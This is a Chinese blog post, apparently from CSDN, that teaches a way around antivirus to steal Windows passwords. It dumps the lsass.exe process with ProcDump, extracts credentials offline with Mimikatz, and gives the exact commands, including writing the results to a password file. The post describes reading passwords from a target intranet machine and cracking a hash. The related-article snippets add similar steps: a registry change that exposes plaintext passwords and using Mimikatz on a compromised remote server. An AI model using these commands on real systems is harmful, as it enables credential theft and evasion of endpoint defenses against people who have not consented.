ProcDump+Mimikatz绕过杀毒软件抓密码

最新推荐文章于 2024-04-24 22:33:04 发布
最新推荐文章于 2024-04-24 22:33:04 发布
阅读量877 收藏 4
点赞数 1
分类专栏: # 内网渗透 文章标签: 网络安全 安全 渗透测试 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43264067/article/details/129301334
版权

抓密码的奇淫技巧

背景

如果主机上装了杀毒软件,开了防火墙,例如:360、火绒之类的话。Mimikatz就会被检测为病毒,无法使用,而想要对Mimikatz进行二次开发或者免杀难度会比较大,那有办法去解决这个问题吗?答案是肯定的,那就是ProcDump+Mimikatz绕过杀毒软件抓密码

1、原理

Mimikatz是从lsass.exe中提取明文密码的,当无法在目标机器上运行Mimikatz时,我们可使用ProcDump工具将系统的lsass.exe进程进行转储,导出dmp文件,拖回到本地后,在本地再利用Mimikatz进行读取。

而ProcDump本身是作为一个正常的运维辅助工具使用,并不带毒,所以不会被杀软查杀。

ProDump下载地址:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/ProcDump

2、实操演示

将工具拷贝到目标机器上执行如下命令(需要管理员权限)

ProcDump.exe -accepteula -ma lsass.exe lsass.dmp

在这里插入图片描述

导出lsass.dmp文件后,使用猕猴桃读取密码hash

Mimikatz# sekurlsa::minidump lsass.dmp
Mimikatz# sekurlsa::logonPasswords full

或者

mimikatz.exe "log" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

为了方便也可以直接输出到密码本

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"> password.txt exit

出现这个代表读取成功
在这里插入图片描述
读取对方内网机器密码
在这里插入图片描述
解md5得到密码108108

在这里插入图片描述

猫鼠信安
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
mimikatz配合procdump密码
qq_44881113的博客
09-16 3850
0x01 获取本地帐户密码 1.1 本地执行 下载mimikatz程序,找到自己系统对应的位数,右键以管理员身份运行: (不是管理员会报错) #提升权限 privilege::debug #密码 sekurlsa::logonpasswords 当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式取明文。 cmd修改注册表命令: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProvider
Mimikatz + procdump使用
键盘上温暖而又美好的时光
11-15 5957
控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行 ​​​​​​https://github.com/gentilkiwi/mimikatz/releases privilege::debug 提取权限 sekurlsa::logonpasswords 密码 mimikatz是从 lsass.exe进程中获取windows的账号及密码的, 这时,我们可以帮对方安装一个procdump64.exe(这是微软自己的工具,可以放心使用) 然后从 lsass.exe
内网渗透-Mimikatz+Procdump使用
最新发布
weixin_60830484的博客
04-24 438
内网渗透中,获取目标明文密码是必不可少的一部分,可以扩大"攻击面",因此本文将讲解相关工具的使用以及原理。
利用Procdump+Mimikatz获取Windows帐户密码
qq_35405259的博客
05-10 3133
0x01 前言: 前段时间拿下一个网站的shell,很幸运的是直接就是System权限,结果发现执行添加用户命令并不能成功回显 看了下系统进程,原来是开启了360的主动防御,奈何也不会做免杀,上传exp运行就被杀,尝试各种方法去kill主动防御进程,无果。。。 在土司发帖求助了一下经验丰富的大佬们,然后就有了如下文章: 实验环境:win7企业版64位 0x02 导出lsass.exe 首先要获取...
procdumpmimikatz联动
weixin_45715461的博客
06-30 640
procdumpmimikatz联动
密码取--Prodump+Mimikatz取windows系统密码
网络安全。
02-13 1328
1、查看目标系统管理员登录情况,管理员在线,到明文密码的可能性更大。 query user 2、查看目标系统版本。 wmic OS get Caption,OSArchitecture 3、通过Procdump dump lsass.exe 进程数据并将其保存到 lsass.dmp 文件中。 procdump64.exe -accepteula -ma lsass.exe lsass.dmp...
procdump+mimikatz.zip
11-14
procdump+mimikatz
procdump32_64+mimikatz.rar
06-15
procdump32_64 mimikatz,测试可以用,获取系统的密码信息。
Procdump密码读取.zip
04-16
用于本地密码内存读取,使用方法包含着压缩包中
C++(Qt)软件崩溃调试-学会使用ProcDump.7z
04-03
1. 之前用过的方法DbgHelp、qBreakpad生成Dump、Linux下配置ulimit -c unlimited生成core的方式功能都比较单一,并且需要配置环境,在程序中调用库,使用较为复杂。 2. 而ProcDump 使用非常简单,不需要配置环境,不...
C++(Qt)软件崩溃调试-学会使用ProcDump(5)20230403.pdf
04-03
1. 之前用过的方法DbgHelp、qBreakpad生成Dump、Linux下配置ulimit -c unlimited生成core的方式功能都比较单一,并且需要配置环境,在程序中调用库,使用较为复杂。 2. 而ProcDump 使用非常简单,不需要配置环境,不...
利用procdump+mimikatz读取windows系统中的密码
LUOBIKUN的博客
09-07 3176
利用procdump+mimikatz读取windows系统中的密码 今天在学习的过程中,认识了一个工具,可以很简单的就读取windows系统的密码,觉得特别有趣,就自己亲自上手尝试了一下,果然很简单,就是因为比较笨,过程有点曲折,特此记录。 工具我也都整理好了, 链接:https://pan.baidu.com/s/1005cCJe-gJq_Q2vZ7M9lwg 提取码:b1q6 procdump,可以将lsass进程的内存文件导出来; mimikatz,可以对导出的内存文件进行分析,从而获取密码。 1,
使用Procdump+mimikatz取windows7明文密码
qq_40671478的博客
09-02 1466
首先打开mimikatz_trunk2.0 在DOS运行界面中输入privilege::debug提权命令1 我们提权成功后,我们再来输入sekurlsa::logonpasswords密码命令 但是出现错误,如下图 网上搜索了一下,我决定使用procdump结合mimikatz实现免杀效果,procdump是微软的官方工具,不会被杀. 首先在任务管理器找到lsass.exe,右键创建转储文件 ...
Procdump+mimikatz绕过安全防护读取密码
xxx9686的博客
09-16 318
在我们提权过程中经常会遇到杀毒软件,在我们将提权exp或者密码读取工具一上传至目标服务器立马被删的尴尬,本文完美解决此问题。Procdump是微软自家的外部工具,其主要目的是监视应用程序中的CPU尖峰并在尖峰期间生成崩溃转储。运行后将会保存lsass到本地,我们可以将该文件拖动到物理机中,使用mimikatz对其密码查看。使用procdump转储lsass进程。
内网渗透mimikatz+procdump 提取 Windows 明文密码
Adminxe的博客
05-05 3308
0x00 原理 获取到内存文件 lsass.exe 进程 (它用于本地安全和登陆策略) 中存储的明文登录密码。 0x01 操作 Windows10/2012 以下的版本: 1、上传 procdump 执行命令转存出 lsass.dmp 文件(需要管理员权限) procdump64.exe -accepteula -ma lsass.exe lsass.dmp 2、拿到 mimika...
【CTF】【渗透】【msf】三、绕过杀毒软件技巧
weixin_45720193的博客
09-28 1685
将demo9999.exe关闭后,拖进Themida进行加壳。生成下面加壳成功的文件,即可避免火绒查杀。上述方法只能用于火绒。
内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap)
qq_45290991的博客
09-16 1081
内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap) 很紧张很“充实”的培训,今天主要是教了怎么取PC的密码…… 密码取5法 1.1mimikatz取明文密码 mimikatz是一个法国人写的轻量级调试器。出众之处在于其可以直接从 lsass.exe 里猎取windows处于active状态账号明文密码,非常强大。 在网上找了一些相关的文章自己的一点总结吧 下载地址:https://github.com/gentilkiwi/mimikatz/rele
利用procdump+Mimikatz绕过杀软获取Windows明文密码
大河之犬的博客
09-12 535
Mimikatz是从lsass.exe中提取明文密码的,当无法在目标机器上运行Mimikatz时,我们可使用ProcDump工具将系统的lsass.exe进程进行转储,导出dmp文件,拖回到本地后,在本地再利用Mimikatz进行读取。而ProcDump本身是作为一个正常的运维辅助工具使用,并不带毒,所以不会被杀软查杀。
Procdump+Mimikatz获取Windows明文密码
SheXinK’s Blog
11-10 2429
Procdump+Mimikatz获取Windows明文密码1 测试环境2 密码 2.1 Server 2008 R2取  2.1.1 生成存储文件  2.1.2 mimiakatz密码获取 2.2 Server 2012 R2取  2.1.1 修改注册表  2.1.2 mimiakatz密码获取 1 测试环境  系统:   Server 2008 R2   Server 2012 R2 ...
procdump命令行安装
05-19
Procdump是一个Windows实用程序,它可以监视一个进程的活动,并在发生特定条件时将其转储到磁盘。Procdump还可以通过在命令行中指定选项来监视多个进程。 以下是在命令行中安装Procdump的步骤: 1. 下载Procdump...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

猫鼠信安

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值